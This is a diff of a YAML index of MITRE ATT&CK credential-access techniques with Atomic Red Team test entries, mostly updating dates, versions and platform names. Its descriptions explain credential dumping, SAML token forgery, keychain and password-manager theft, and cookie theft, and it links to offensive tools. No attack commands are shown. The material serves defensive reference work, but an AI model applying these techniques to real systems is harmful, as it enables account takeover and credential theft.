+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -48434,7 +49096,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: MacOS Swift Keylogger
@@ -48474,7 +49135,7 @@ credential-access:
         elevation_required: false
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -48503,6 +49164,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -48514,18 +49176,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -48552,14 +49214,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -48683,12 +49342,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -48703,10 +49361,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -48714,14 +49373,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -48764,9 +49423,6 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests:
     - name: Steal Chrome Cookies via Remote Debugging (Mac)
@@ -48806,7 +49462,7 @@ credential-access:
         elevation_required: false
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -48861,14 +49517,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -48919,14 +49574,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -48960,8 +49614,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -48978,11 +49632,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -49000,7 +49653,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -49017,10 +49670,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -49044,46 +49697,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -49104,25 +49723,57 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests:
     - name: Keychain Dump
@@ -49178,42 +49829,7 @@ credential-access:
         elevation_required: false
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -49222,6 +49838,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -49229,31 +49848,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -49266,14 +49917,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -49314,14 +49965,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -49384,81 +50032,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49543,7 +50189,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
